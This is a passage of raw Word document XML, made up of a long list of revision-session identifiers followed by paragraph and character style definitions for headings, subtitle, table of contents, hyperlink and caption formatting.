    <w:rsid w:val="008B5190"/>
    <w:rsid w:val="008C1007"/>
    <w:rsid w:val="008C12AD"/>
    <w:rsid w:val="008C2D21"/>
    <w:rsid w:val="008D0D24"/>
    <w:rsid w:val="008D13FE"/>
    <w:rsid w:val="008D3E48"/>
    <w:rsid w:val="008D3E89"/>
    <w:rsid w:val="008D7F6F"/>
    <w:rsid w:val="008E398D"/>
    <w:rsid w:val="008E44B4"/>
    <w:rsid w:val="008E5521"/>
    <w:rsid w:val="008E7BF9"/>
    <w:rsid w:val="008E7FBA"/>
    <w:rsid w:val="008F14A1"/>
    <w:rsid w:val="008F3830"/>
    <w:rsid w:val="008F3B15"/>
    <w:rsid w:val="008F688B"/>
    <w:rsid w:val="008F688C"/>
    <w:rsid w:val="00902B5E"/>
    <w:rsid w:val="009137B4"/>
    <w:rsid w:val="009142C6"/>
    <w:rsid w:val="009209B3"/>
    <w:rsid w:val="009226F1"/>
    <w:rsid w:val="00922FCA"/>
    <w:rsid w:val="009306E9"/>
    <w:rsid w:val="00936117"/>
    <w:rsid w:val="009405FE"/>
    <w:rsid w:val="00941C5F"/>
    <w:rsid w:val="009422F5"/>
    <w:rsid w:val="009437F6"/>
    <w:rsid w:val="00947082"/>
    <w:rsid w:val="00954D12"/>
    <w:rsid w:val="00960182"/>
    <w:rsid w:val="0096469B"/>
    <w:rsid w:val="00967DAB"/>
    <w:rsid w:val="00967FB2"/>
    <w:rsid w:val="00970643"/>
    <w:rsid w:val="00970B99"/>
    <w:rsid w:val="00972800"/>
    <w:rsid w:val="0097339C"/>
    <w:rsid w:val="00974F02"/>
    <w:rsid w:val="00977081"/>
    <w:rsid w:val="009813B2"/>
    <w:rsid w:val="009813B9"/>
    <w:rsid w:val="00981599"/>
    <w:rsid w:val="00981D74"/>
    <w:rsid w:val="00982A04"/>
    <w:rsid w:val="00986C6E"/>
    <w:rsid w:val="00991450"/>
    <w:rsid w:val="00992DF6"/>
    <w:rsid w:val="009A2A8E"/>
    <w:rsid w:val="009A4B04"/>
    <w:rsid w:val="009B4171"/>
    <w:rsid w:val="009B6933"/>
    <w:rsid w:val="009B7448"/>
    <w:rsid w:val="009C0E6B"/>
    <w:rsid w:val="009C314D"/>
    <w:rsid w:val="009C4245"/>
    <w:rsid w:val="009C636C"/>
    <w:rsid w:val="009C6811"/>
    <w:rsid w:val="009C6BE3"/>
    <w:rsid w:val="009D0FD1"/>
    <w:rsid w:val="009D248A"/>
    <w:rsid w:val="009D5FA5"/>
    <w:rsid w:val="009D78BC"/>
    <w:rsid w:val="009E0A9D"/>
    <w:rsid w:val="009E59E2"/>
    <w:rsid w:val="009E67A5"/>
    <w:rsid w:val="009E7798"/>
    <w:rsid w:val="009E788F"/>
    <w:rsid w:val="009F0A04"/>
    <w:rsid w:val="009F109D"/>
    <w:rsid w:val="00A02515"/>
    <w:rsid w:val="00A03248"/>
    <w:rsid w:val="00A03262"/>
    <w:rsid w:val="00A04E1A"/>
    <w:rsid w:val="00A06C1C"/>
    <w:rsid w:val="00A109D9"/>
    <w:rsid w:val="00A1209E"/>
    <w:rsid w:val="00A1694C"/>
    <w:rsid w:val="00A17814"/>
    <w:rsid w:val="00A17A82"/>
    <w:rsid w:val="00A17D2F"/>
    <w:rsid w:val="00A22997"/>
    <w:rsid w:val="00A23B0B"/>
    <w:rsid w:val="00A23F22"/>
    <w:rsid w:val="00A31860"/>
    <w:rsid w:val="00A31CA7"/>
    <w:rsid w:val="00A31DBA"/>
    <w:rsid w:val="00A3371D"/>
    <w:rsid w:val="00A3392C"/>
    <w:rsid w:val="00A339E0"/>
    <w:rsid w:val="00A36747"/>
    <w:rsid w:val="00A37448"/>
    <w:rsid w:val="00A41AD7"/>
    <w:rsid w:val="00A43AA6"/>
    <w:rsid w:val="00A45325"/>
    <w:rsid w:val="00A46649"/>
    <w:rsid w:val="00A47A61"/>
    <w:rsid w:val="00A513DF"/>
    <w:rsid w:val="00A53E3C"/>
    <w:rsid w:val="00A5686D"/>
    <w:rsid w:val="00A6144D"/>
    <w:rsid w:val="00A62707"/>
    <w:rsid w:val="00A627C1"/>
    <w:rsid w:val="00A62992"/>
    <w:rsid w:val="00A63150"/>
    <w:rsid w:val="00A6445D"/>
    <w:rsid w:val="00A650E1"/>
    <w:rsid w:val="00A66919"/>
    <w:rsid w:val="00A71210"/>
    <w:rsid w:val="00A71245"/>
    <w:rsid w:val="00A76774"/>
    <w:rsid w:val="00A76DE6"/>
    <w:rsid w:val="00A821B1"/>
    <w:rsid w:val="00A84DA8"/>
    <w:rsid w:val="00A85E1D"/>
    <w:rsid w:val="00A920C7"/>
    <w:rsid w:val="00A9211B"/>
    <w:rsid w:val="00A93346"/>
    <w:rsid w:val="00A96D85"/>
    <w:rsid w:val="00A97ECA"/>
    <w:rsid w:val="00AA0B97"/>
    <w:rsid w:val="00AA1C65"/>
    <w:rsid w:val="00AA2218"/>
    <w:rsid w:val="00AA3505"/>
    <w:rsid w:val="00AA4B6C"/>
    <w:rsid w:val="00AA7B77"/>
    <w:rsid w:val="00AB31C3"/>
    <w:rsid w:val="00AB416D"/>
    <w:rsid w:val="00AB43D9"/>
    <w:rsid w:val="00AB607F"/>
    <w:rsid w:val="00AC0451"/>
    <w:rsid w:val="00AC304C"/>
    <w:rsid w:val="00AC499D"/>
    <w:rsid w:val="00AC4D02"/>
    <w:rsid w:val="00AC65F0"/>
    <w:rsid w:val="00AD0C7F"/>
    <w:rsid w:val="00AD1327"/>
    <w:rsid w:val="00AD2065"/>
    <w:rsid w:val="00AD2082"/>
    <w:rsid w:val="00AD601D"/>
    <w:rsid w:val="00AE0FA7"/>
    <w:rsid w:val="00AE3144"/>
    <w:rsid w:val="00AE4482"/>
    <w:rsid w:val="00AE790F"/>
    <w:rsid w:val="00AF2257"/>
    <w:rsid w:val="00AF76C0"/>
    <w:rsid w:val="00B0274E"/>
    <w:rsid w:val="00B030AB"/>
    <w:rsid w:val="00B03EDB"/>
    <w:rsid w:val="00B06B52"/>
    <w:rsid w:val="00B10399"/>
    <w:rsid w:val="00B15B95"/>
    <w:rsid w:val="00B223E6"/>
    <w:rsid w:val="00B22674"/>
    <w:rsid w:val="00B33040"/>
    <w:rsid w:val="00B36A54"/>
    <w:rsid w:val="00B40DEF"/>
    <w:rsid w:val="00B44447"/>
    <w:rsid w:val="00B4577F"/>
    <w:rsid w:val="00B45B57"/>
    <w:rsid w:val="00B47F18"/>
    <w:rsid w:val="00B54CF7"/>
    <w:rsid w:val="00B558A3"/>
    <w:rsid w:val="00B5691B"/>
    <w:rsid w:val="00B60421"/>
    <w:rsid w:val="00B61CD3"/>
    <w:rsid w:val="00B6642E"/>
    <w:rsid w:val="00B70841"/>
    <w:rsid w:val="00B728D7"/>
    <w:rsid w:val="00B72F58"/>
    <w:rsid w:val="00B7334E"/>
    <w:rsid w:val="00B77DD1"/>
    <w:rsid w:val="00B80BD9"/>
    <w:rsid w:val="00B80C57"/>
    <w:rsid w:val="00B8168C"/>
    <w:rsid w:val="00B82E85"/>
    <w:rsid w:val="00B83046"/>
    <w:rsid w:val="00B8714D"/>
    <w:rsid w:val="00B90435"/>
    <w:rsid w:val="00B95A5A"/>
    <w:rsid w:val="00B96AAE"/>
    <w:rsid w:val="00BA341D"/>
    <w:rsid w:val="00BB2A34"/>
    <w:rsid w:val="00BC4937"/>
    <w:rsid w:val="00BC4B78"/>
    <w:rsid w:val="00BC5BB4"/>
    <w:rsid w:val="00BC61F9"/>
    <w:rsid w:val="00BC66E8"/>
    <w:rsid w:val="00BC6A25"/>
    <w:rsid w:val="00BC6A77"/>
    <w:rsid w:val="00BD14F6"/>
    <w:rsid w:val="00BD4334"/>
    <w:rsid w:val="00BD5A65"/>
    <w:rsid w:val="00BD71A2"/>
    <w:rsid w:val="00BE17F6"/>
    <w:rsid w:val="00BE7E14"/>
    <w:rsid w:val="00BF1EA5"/>
    <w:rsid w:val="00BF31AF"/>
    <w:rsid w:val="00C006B0"/>
    <w:rsid w:val="00C02024"/>
    <w:rsid w:val="00C025EC"/>
    <w:rsid w:val="00C03FE9"/>
    <w:rsid w:val="00C04445"/>
    <w:rsid w:val="00C04964"/>
    <w:rsid w:val="00C11121"/>
    <w:rsid w:val="00C151B1"/>
    <w:rsid w:val="00C15E78"/>
    <w:rsid w:val="00C20051"/>
    <w:rsid w:val="00C21CFE"/>
    <w:rsid w:val="00C22827"/>
    <w:rsid w:val="00C23597"/>
    <w:rsid w:val="00C25696"/>
    <w:rsid w:val="00C263FF"/>
    <w:rsid w:val="00C27218"/>
    <w:rsid w:val="00C34345"/>
    <w:rsid w:val="00C35800"/>
    <w:rsid w:val="00C362B0"/>
    <w:rsid w:val="00C421FA"/>
    <w:rsid w:val="00C456A8"/>
    <w:rsid w:val="00C47F5C"/>
    <w:rsid w:val="00C510AA"/>
    <w:rsid w:val="00C5133B"/>
    <w:rsid w:val="00C521D6"/>
    <w:rsid w:val="00C52AA8"/>
    <w:rsid w:val="00C54168"/>
    <w:rsid w:val="00C549B1"/>
    <w:rsid w:val="00C5516F"/>
    <w:rsid w:val="00C56416"/>
    <w:rsid w:val="00C607E6"/>
    <w:rsid w:val="00C61E5D"/>
    <w:rsid w:val="00C627D0"/>
    <w:rsid w:val="00C728C4"/>
    <w:rsid w:val="00C73EC5"/>
    <w:rsid w:val="00C75431"/>
    <w:rsid w:val="00C77158"/>
    <w:rsid w:val="00C77CD7"/>
    <w:rsid w:val="00C827E2"/>
    <w:rsid w:val="00C82C39"/>
    <w:rsid w:val="00C84656"/>
    <w:rsid w:val="00C848CC"/>
    <w:rsid w:val="00C85BF3"/>
    <w:rsid w:val="00C85C85"/>
    <w:rsid w:val="00C8706B"/>
    <w:rsid w:val="00C9077A"/>
    <w:rsid w:val="00C911A2"/>
    <w:rsid w:val="00C93DB4"/>
    <w:rsid w:val="00C969C9"/>
    <w:rsid w:val="00CA03D6"/>
    <w:rsid w:val="00CA0B92"/>
    <w:rsid w:val="00CA17A7"/>
    <w:rsid w:val="00CA2734"/>
    <w:rsid w:val="00CB3420"/>
    <w:rsid w:val="00CB3C2D"/>
    <w:rsid w:val="00CB556B"/>
    <w:rsid w:val="00CB5757"/>
    <w:rsid w:val="00CB75B2"/>
    <w:rsid w:val="00CC36C3"/>
    <w:rsid w:val="00CC3B4E"/>
    <w:rsid w:val="00CC56A6"/>
    <w:rsid w:val="00CC5764"/>
    <w:rsid w:val="00CE048D"/>
    <w:rsid w:val="00CE2071"/>
    <w:rsid w:val="00CE2488"/>
    <w:rsid w:val="00CE3661"/>
    <w:rsid w:val="00CE3DCE"/>
    <w:rsid w:val="00CE429D"/>
    <w:rsid w:val="00CE51C5"/>
    <w:rsid w:val="00CE6E5D"/>
    <w:rsid w:val="00CE7965"/>
    <w:rsid w:val="00CF1BF9"/>
    <w:rsid w:val="00CF2D57"/>
    <w:rsid w:val="00CF2E2E"/>
    <w:rsid w:val="00CF43AE"/>
    <w:rsid w:val="00CF4CE5"/>
    <w:rsid w:val="00CF5070"/>
    <w:rsid w:val="00CF5178"/>
    <w:rsid w:val="00CF5CAB"/>
    <w:rsid w:val="00CF5F9F"/>
    <w:rsid w:val="00CF6846"/>
    <w:rsid w:val="00D0202F"/>
    <w:rsid w:val="00D03F10"/>
    <w:rsid w:val="00D05598"/>
    <w:rsid w:val="00D07277"/>
    <w:rsid w:val="00D11446"/>
    <w:rsid w:val="00D1575C"/>
    <w:rsid w:val="00D20742"/>
    <w:rsid w:val="00D2362D"/>
    <w:rsid w:val="00D27084"/>
    <w:rsid w:val="00D30365"/>
    <w:rsid w:val="00D315FD"/>
    <w:rsid w:val="00D409D6"/>
    <w:rsid w:val="00D40BF5"/>
    <w:rsid w:val="00D40FBD"/>
    <w:rsid w:val="00D42177"/>
    <w:rsid w:val="00D42333"/>
    <w:rsid w:val="00D44358"/>
    <w:rsid w:val="00D44DC6"/>
    <w:rsid w:val="00D44E80"/>
    <w:rsid w:val="00D46350"/>
    <w:rsid w:val="00D478A2"/>
    <w:rsid w:val="00D501FA"/>
    <w:rsid w:val="00D54301"/>
    <w:rsid w:val="00D54A74"/>
    <w:rsid w:val="00D555D9"/>
    <w:rsid w:val="00D61D73"/>
    <w:rsid w:val="00D63429"/>
    <w:rsid w:val="00D639CB"/>
    <w:rsid w:val="00D64605"/>
    <w:rsid w:val="00D6519F"/>
    <w:rsid w:val="00D67E61"/>
    <w:rsid w:val="00D73290"/>
    <w:rsid w:val="00D7524E"/>
    <w:rsid w:val="00D80EEC"/>
    <w:rsid w:val="00D81B90"/>
    <w:rsid w:val="00D856A2"/>
    <w:rsid w:val="00D91BCB"/>
    <w:rsid w:val="00D940D3"/>
    <w:rsid w:val="00D9469C"/>
    <w:rsid w:val="00D97660"/>
    <w:rsid w:val="00DA0D76"/>
    <w:rsid w:val="00DA193D"/>
    <w:rsid w:val="00DA1EA3"/>
    <w:rsid w:val="00DA460C"/>
    <w:rsid w:val="00DA717B"/>
    <w:rsid w:val="00DB53D3"/>
    <w:rsid w:val="00DC4D8E"/>
    <w:rsid w:val="00DD19DA"/>
    <w:rsid w:val="00DD2720"/>
    <w:rsid w:val="00DD3FCA"/>
    <w:rsid w:val="00DD46EB"/>
    <w:rsid w:val="00DD6251"/>
    <w:rsid w:val="00DD62E8"/>
    <w:rsid w:val="00DD7FAC"/>
    <w:rsid w:val="00DE111B"/>
    <w:rsid w:val="00DE40C9"/>
    <w:rsid w:val="00DE494E"/>
    <w:rsid w:val="00DE6312"/>
    <w:rsid w:val="00DF1C41"/>
    <w:rsid w:val="00DF42B8"/>
    <w:rsid w:val="00DF6D90"/>
    <w:rsid w:val="00DF7587"/>
    <w:rsid w:val="00DF798E"/>
    <w:rsid w:val="00E02D76"/>
    <w:rsid w:val="00E0580D"/>
    <w:rsid w:val="00E07A55"/>
    <w:rsid w:val="00E13242"/>
    <w:rsid w:val="00E22418"/>
    <w:rsid w:val="00E2381A"/>
    <w:rsid w:val="00E25B58"/>
    <w:rsid w:val="00E31796"/>
    <w:rsid w:val="00E32E30"/>
    <w:rsid w:val="00E33F6A"/>
    <w:rsid w:val="00E37894"/>
    <w:rsid w:val="00E40440"/>
    <w:rsid w:val="00E42F41"/>
    <w:rsid w:val="00E46032"/>
    <w:rsid w:val="00E47C19"/>
    <w:rsid w:val="00E517B5"/>
    <w:rsid w:val="00E54AFE"/>
    <w:rsid w:val="00E6222A"/>
    <w:rsid w:val="00E74CD6"/>
    <w:rsid w:val="00E75EC5"/>
    <w:rsid w:val="00E76698"/>
    <w:rsid w:val="00E7765B"/>
    <w:rsid w:val="00E82028"/>
    <w:rsid w:val="00E822DA"/>
    <w:rsid w:val="00E84402"/>
    <w:rsid w:val="00E84D9A"/>
    <w:rsid w:val="00E91390"/>
    <w:rsid w:val="00E923A4"/>
    <w:rsid w:val="00E935B8"/>
    <w:rsid w:val="00E93940"/>
    <w:rsid w:val="00E94B05"/>
    <w:rsid w:val="00E956D7"/>
    <w:rsid w:val="00EA07FF"/>
    <w:rsid w:val="00EA1094"/>
    <w:rsid w:val="00EA3EAC"/>
    <w:rsid w:val="00EB4313"/>
    <w:rsid w:val="00EB60F4"/>
    <w:rsid w:val="00EB6712"/>
    <w:rsid w:val="00EB7EBD"/>
    <w:rsid w:val="00EC044C"/>
    <w:rsid w:val="00EC08D3"/>
    <w:rsid w:val="00EC0CFC"/>
    <w:rsid w:val="00EC0D7E"/>
    <w:rsid w:val="00EC2F5D"/>
    <w:rsid w:val="00EC316A"/>
    <w:rsid w:val="00EC65FF"/>
    <w:rsid w:val="00EC770C"/>
    <w:rsid w:val="00ED1E38"/>
    <w:rsid w:val="00ED1EDD"/>
    <w:rsid w:val="00ED39AB"/>
    <w:rsid w:val="00ED3FEC"/>
    <w:rsid w:val="00ED561A"/>
    <w:rsid w:val="00ED5FB7"/>
    <w:rsid w:val="00EE157C"/>
    <w:rsid w:val="00EE5567"/>
    <w:rsid w:val="00EF212C"/>
    <w:rsid w:val="00EF2356"/>
    <w:rsid w:val="00EF44C2"/>
    <w:rsid w:val="00EF7076"/>
    <w:rsid w:val="00F032C8"/>
    <w:rsid w:val="00F0692A"/>
    <w:rsid w:val="00F132E8"/>
    <w:rsid w:val="00F20420"/>
    <w:rsid w:val="00F2399F"/>
    <w:rsid w:val="00F246E5"/>
    <w:rsid w:val="00F248CA"/>
    <w:rsid w:val="00F27670"/>
    <w:rsid w:val="00F32999"/>
    <w:rsid w:val="00F355F3"/>
    <w:rsid w:val="00F36042"/>
    <w:rsid w:val="00F360EF"/>
    <w:rsid w:val="00F37875"/>
    <w:rsid w:val="00F41992"/>
    <w:rsid w:val="00F42B19"/>
    <w:rsid w:val="00F43D2A"/>
    <w:rsid w:val="00F44756"/>
    <w:rsid w:val="00F45448"/>
    <w:rsid w:val="00F51B8C"/>
    <w:rsid w:val="00F53B03"/>
    <w:rsid w:val="00F53CB8"/>
    <w:rsid w:val="00F5457B"/>
    <w:rsid w:val="00F573E9"/>
    <w:rsid w:val="00F5796F"/>
    <w:rsid w:val="00F71CDC"/>
    <w:rsid w:val="00F74977"/>
    <w:rsid w:val="00F75777"/>
    <w:rsid w:val="00F776B4"/>
    <w:rsid w:val="00F81670"/>
    <w:rsid w:val="00F82E4B"/>
    <w:rsid w:val="00F82F7C"/>
    <w:rsid w:val="00F842A7"/>
    <w:rsid w:val="00F84A46"/>
    <w:rsid w:val="00F867E3"/>
    <w:rsid w:val="00F87B44"/>
    <w:rsid w:val="00F91B1B"/>
    <w:rsid w:val="00F92377"/>
    <w:rsid w:val="00F93DB2"/>
    <w:rsid w:val="00FA0E34"/>
    <w:rsid w:val="00FA200E"/>
    <w:rsid w:val="00FB6DDC"/>
    <w:rsid w:val="00FC0879"/>
    <w:rsid w:val="00FC1E00"/>
    <w:rsid w:val="00FC3564"/>
    <w:rsid w:val="00FC457E"/>
    <w:rsid w:val="00FC607C"/>
    <w:rsid w:val="00FD319F"/>
    <w:rsid w:val="00FD4373"/>
    <w:rsid w:val="00FD5B1E"/>
    <w:rsid w:val="00FD784A"/>
    <w:rsid w:val="00FE0119"/>
    <w:rsid w:val="00FE2B66"/>
    <w:rsid w:val="00FE317D"/>
    <w:rsid w:val="00FE6E3A"/>
    <w:rsid w:val="00FF39D1"/>
    <w:rsid w:val="00FF4EFD"/>
    <w:rsid w:val="00FF6BAC"/>
    <w:rsid w:val="145E7D00"/>
    <w:rsid w:val="1994D2CC"/>
    <w:rsid w:val="1CF3181C"/>
    <w:rsid w:val="21523073"/>
    <w:rsid w:val="2688F161"/>
    <w:rsid w:val="26C09EF0"/>
    <w:rsid w:val="2928074E"/>
    <w:rsid w:val="2B7AE7B6"/>
    <w:rsid w:val="2BB1CAFC"/>
    <w:rsid w:val="2C4211CE"/>
    <w:rsid w:val="3B172409"/>
    <w:rsid w:val="3B536636"/>
    <w:rsid w:val="3BFB780D"/>
    <w:rsid w:val="41DA0E18"/>
    <w:rsid w:val="43090D91"/>
    <w:rsid w:val="43C78750"/>
    <w:rsid w:val="485E20E0"/>
    <w:rsid w:val="487D3D8A"/>
    <w:rsid w:val="4BDB82DA"/>
    <w:rsid w:val="551D5B75"/>
    <w:rsid w:val="56D8D9EB"/>
    <w:rsid w:val="59966065"/>
    <w:rsid w:val="5A99D113"/>
    <w:rsid w:val="5B28B624"/>
    <w:rsid w:val="5CC67FBE"/>
    <w:rsid w:val="5CCE0127"/>
    <w:rsid w:val="60B25C9D"/>
    <w:rsid w:val="653A04F7"/>
    <w:rsid w:val="695DADF7"/>
    <w:rsid w:val="6DECF274"/>
    <w:rsid w:val="6F156CA3"/>
    <w:rsid w:val="749A2071"/>
    <w:rsid w:val="75E139DC"/>
    <w:rsid w:val="7725B13A"/>
    <w:rsid w:val="79A23104"/>
    <w:rsid w:val="7A8E3942"/>
    <w:rsid w:val="7B99FE76"/>
    <w:rsid w:val="7F23A3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2047B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E66838A5-984F-419E-96B5-88A632E36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4553"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="0060608D"/>
    <w:pPr>
      <w:ind w:hanging="720"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0060608D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00991450"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="left" w:pos="1701"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="0"/>
      <w:ind w:left="851"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00E42F41"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>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409D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09D6"/>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2B5FC6"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0060608D"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0060608D"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC316A"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00BD5A65"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="254" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00BD5A65"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006F5D33"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F5D33"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A31DBA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F5D33"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B80C57"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00991450"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006060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4944D3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1701"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
